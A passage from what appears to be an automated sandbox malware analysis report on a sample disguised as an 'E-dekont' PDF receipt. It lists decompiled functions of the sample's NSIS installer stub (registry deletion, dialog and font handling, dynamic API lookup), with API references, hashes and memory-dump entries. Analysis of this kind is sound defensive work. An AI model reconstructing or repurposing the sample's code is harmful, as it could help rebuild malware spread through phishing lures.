							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                              0x00402eb4
                                                                                              0x00402ebd
                                                                                              0x00402ec6
                                                                                              0x00402ed2
                                                                                              0x00402edb
                                                                                              0x00402ee5
                                                                                              0x00402f0a
                                                                                              0x00402f10
                                                                                              0x00402f15
                                                                                              0x00402f16
                                                                                              0x00402f46
                                                                                              0x00402f1f
                                                                                              0x00402f21
                                                                                              0x00402f71
                                                                                              0x00402f74
                                                                                              0x00000000
                                                                                              0x00402f7a
                                                                                              0x00402f30
                                                                                              0x00402f35
                                                                                              0x00402f37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402f3f
                                                                                              0x00402f44
                                                                                              0x00402f45
                                                                                              0x00402f45
                                                                                              0x00402f52
                                                                                              0x00402f5a
                                                                                              0x00402f61
                                                                                              0x00000000
                                                                                              0x00402f8a
                                                                                              0x00000000
                                                                                              0x00402f69
                                                                                              0x00402ef5
                                                                                              0x00402f08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402f08
                                                                                              0x00402f90

                                                                                              APIs
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                              • String ID:
                                                                                              • API String ID: 1354259210-0
                                                                                              • Opcode ID: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                                                              • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                              • Opcode Fuzzy Hash: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                                                              • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x470260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                              0x00401d81
                                                                                              0x00401d85
                                                                                              0x00401d9a
                                                                                              0x00401d87
                                                                                              0x00401d89
                                                                                              0x00401d8f
                                                                                              0x00401d8f
                                                                                              0x00401da0
                                                                                              0x00401da3
                                                                                              0x00401dad
                                                                                              0x00401db0
                                                                                              0x00401db8
                                                                                              0x00401dc9
                                                                                              0x00401dcc
                                                                                              0x00401dd7
                                                                                              0x00401dce
                                                                                              0x00401dd0
                                                                                              0x00401dd0
                                                                                              0x00401ddb
                                                                                              0x00401de5
                                                                                              0x00401e0c
                                                                                              0x00401e1b
                                                                                              0x00401e29
                                                                                              0x00401e31
                                                                                              0x00401e39
                                                                                              0x00401e39
                                                                                              0x00401e42
                                                                                              0x00401e48
                                                                                              0x00402ba4
                                                                                              0x00402ba4
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                              • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: b5db10c0c9aacf7f97fe50e7c8c0e04c5aa13c126eb7b00f3e94dcb33a1aed82
                                                                                              • Instruction ID: 624ac4784615ce63dc07ef02f7b825d3173763d74ee411cf76b7c4d1df5b7033
                                                                                              • Opcode Fuzzy Hash: b5db10c0c9aacf7f97fe50e7c8c0e04c5aa13c126eb7b00f3e94dcb33a1aed82
                                                                                              • Instruction Fuzzy Hash: 2B21F872904119AFCB05DBA4DE45AEEBBB5EF08304F14003AF945F62A1DB389D51DB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 73%
                                                                                              			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x41e5f8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x41e608 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x41e60f = 1;
				 *0x41e60c = _t15 & 0x00000001;
				 *0x41e60d = _t15 & 0x00000002;
				 *0x41e60e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x41e614,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x41e5f8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                              0x00401e4e
                                                                                              0x00401e59
                                                                                              0x00401e5b
                                                                                              0x00401e68
                                                                                              0x00401e7f
                                                                                              0x00401e84
                                                                                              0x00401e91
                                                                                              0x00401e96
                                                                                              0x00401e9a
                                                                                              0x00401ea5
                                                                                              0x00401eac
                                                                                              0x00401ebe
                                                                                              0x00401ec4
                                                                                              0x00401ec9
                                                                                              0x00401ed3
                                                                                              0x00402638
                                                                                              0x0040156d
                                                                                              0x00402ba4
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401E51
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000), ref: 004068A4
                                                                                              • CreateFontIndirectW.GDI32(0041E5F8), ref: 00401ED3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2584051700-0
                                                                                              • Opcode ID: ac47535880b9863beca2078bf34556c07f4f5ebffc560490134b37c357c9fcbe
                                                                                              • Instruction ID: 36bed5ab4faf7b9a1f757ca6c78a105dea61272c2268030551a41d9a6dd48de5
                                                                                              • Opcode Fuzzy Hash: ac47535880b9863beca2078bf34556c07f4f5ebffc560490134b37c357c9fcbe
                                                                                              • Instruction Fuzzy Hash: 3A01D475900261AFEB005BB5AD0EBDA7FB0AB25305F50C83AF941B71E2CAB90044CB2C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F131F7B Relevance: 7.5, APIs: 5, Instructions: 38memorylibraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F131F7B(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t11;

				_t11 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t11);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t11, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                                              0x6f131f92
                                                                                              0x6f131fa0
                                                                                              0x6f131fab
                                                                                              0x6f131fb6
                                                                                              0x6f131fbf
                                                                                              0x6f131fca

                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6F132B4C,00000000,00000808), ref: 6F131F8C
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6F131F97
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6F131FAB
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 6F131FB6
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F131FBF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77216589547.000000006F131000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F130000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77216556616.000000006F130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216631683.000000006F134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216670009.000000006F136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6f130000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                              • String ID:
                                                                                              • API String ID: 1148316912-0
                                                                                              • Opcode ID: 06ef5ecadaa4a3254f325d0db2fc1458d7ec0632ca1c2b72fc8439ffaecd7dea
                                                                                              • Instruction ID: f04e46c6592381053607a3d6d256ff43be5cd92c733700cd0628a120edf20dad
                                                                                              • Opcode Fuzzy Hash: 06ef5ecadaa4a3254f325d0db2fc1458d7ec0632ca1c2b72fc8439ffaecd7dea
                                                                                              • Instruction Fuzzy Hash: E4F0C033208518BBCA201AE7DC0CD97BE6CFB8B6FAB160215F619D11A0C56368108771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 59%
                                                                                              			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push("true");
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                              0x00401c43
                                                                                              0x00401c45
                                                                                              0x00401c4c
                                                                                              0x00401c4f
                                                                                              0x00401c52
                                                                                              0x00401c5c
                                                                                              0x00401c60
                                                                                              0x00401c63
                                                                                              0x00401c6c
                                                                                              0x00401c6c
                                                                                              0x00401c6f
                                                                                              0x00401c73
                                                                                              0x00401c7c
                                                                                              0x00401c7c
                                                                                              0x00401c7f
                                                                                              0x00401c83
                                                                                              0x00401c85
                                                                                              0x00401cda
                                                                                              0x00401cdc
                                                                                              0x00401ce7
                                                                                              0x00401cf1
                                                                                              0x00401cf4
                                                                                              0x00401cf4
                                                                                              0x00401cfd
                                                                                              0x00000000
                                                                                              0x00401c87
                                                                                              0x00401c8e
                                                                                              0x00401c90
                                                                                              0x00401c93
                                                                                              0x00401c99
                                                                                              0x00401ca0
                                                                                              0x00401ca3
                                                                                              0x00401ccb
                                                                                              0x00401d03
                                                                                              0x00401d03
                                                                                              0x00401ca5
                                                                                              0x00401cb3
                                                                                              0x00401cbb
                                                                                              0x00401cbe
                                                                                              0x00401cbe
                                                                                              0x00401ca3
                                                                                              0x00401d06
                                                                                              0x00401d09
                                                                                              0x00401d0f
                                                                                              0x00402ba4
                                                                                              0x00402ba4
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: 861fd0dae12549c50b8a810ef332554a23f4158293fb1cef7de84819eed8abba
                                                                                              • Instruction ID: 2b7fef74a1ecbfa2811e8617818f10e77e8ac0f2b345209abc679ece4561fc10
                                                                                              • Opcode Fuzzy Hash: 861fd0dae12549c50b8a810ef332554a23f4158293fb1cef7de84819eed8abba
                                                                                              • Instruction Fuzzy Hash: 14218D7194420AAFEF05AFA4D94AAAE7BB4FF44304F14453EF605B61D0D7B889418B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F131F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F131F1E(intOrPtr _a4, WCHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				WCHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x6f1340d8 : L"error";
					lstrcpyW(_t21,  ==  ? 0x6f1340d8 : L"error");
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1c98));
					if(( *(_t11 + 0x1010) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x100c)) + 1));
					}
					_t21 = _a8;
					wsprintfW(_t21, L"callback%d", _t19);
				}
				return _t21;
			}






                                                                                              0x6f131f1e
                                                                                              0x6f131f29
                                                                                              0x6f131f5c
                                                                                              0x6f131f6c
                                                                                              0x6f131f71
                                                                                              0x6f131f2b
                                                                                              0x6f131f35
                                                                                              0x6f131f3b
                                                                                              0x6f131f43
                                                                                              0x6f131f43
                                                                                              0x6f131f46
                                                                                              0x6f131f51
                                                                                              0x6f131f57
                                                                                              0x6f131f7a

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77216589547.000000006F131000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F130000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77216556616.000000006F130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216631683.000000006F134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216670009.000000006F136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6f130000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpywsprintf
                                                                                              • String ID: callback%d$error
                                                                                              • API String ID: 2408954437-1307476583
                                                                                              • Opcode ID: 58f5b7f31e5a799814f9943010acded434fb0a725a2fc6fabb861b801905bd9d
                                                                                              • Instruction ID: eac1a0e2cef95962d7fd9b827ab41e3197a34494c63558ed8db6475ef9a5bba5
                                                                                              • Opcode Fuzzy Hash: 58f5b7f31e5a799814f9943010acded434fb0a725a2fc6fabb861b801905bd9d
                                                                                              • Instruction Fuzzy Hash: 77F01236B04120AFD7088B04D548DFA73A9FF86390F0585A8F959AB211C776EC648B95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 53%
                                                                                              			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x45a750, _a4);
				_t21 = E00405FE2(0x45a750);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x470278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x45a750 >> 1;
						while(1) {
							_t11 = lstrlenW(0x45a750);
							_push(0x45a750);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x45a750);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                              0x0040604b
                                                                                              0x00406056
                                                                                              0x0040605a
                                                                                              0x00406061
                                                                                              0x0040606d
                                                                                              0x0040607d
                                                                                              0x0040607f
                                                                                              0x00406097
                                                                                              0x00406098
                                                                                              0x0040609f
                                                                                              0x004060a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406083
                                                                                              0x0040608a
                                                                                              0x00406092
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040608a
                                                                                              0x004060a2
                                                                                              0x00000000
                                                                                              0x004060b6
                                                                                              0x0040606f
                                                                                              0x00406075
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406075
                                                                                              0x0040605c
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00002000,004037B0,00468260,NSIS Error), ref: 00406675
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,0045A750,?,00406056,0045A750,0045A750, 4?v.?v,?,763F2EE0,00405D94,?,763F3420,763F2EE0,00000000), ref: 00405FF0
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                              • lstrlenW.KERNEL32(0045A750,00000000,0045A750,0045A750, 4?v.?v,?,763F2EE0,00405D94,?,763F3420,763F2EE0,00000000), ref: 00406098
                                                                                              • GetFileAttributesW.KERNEL32(0045A750,0045A750,0045A750,0045A750,0045A750,0045A750,00000000,0045A750,0045A750, 4?v.?v,?,763F2EE0,00405D94,?,763F3420,763F2EE0), ref: 004060A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
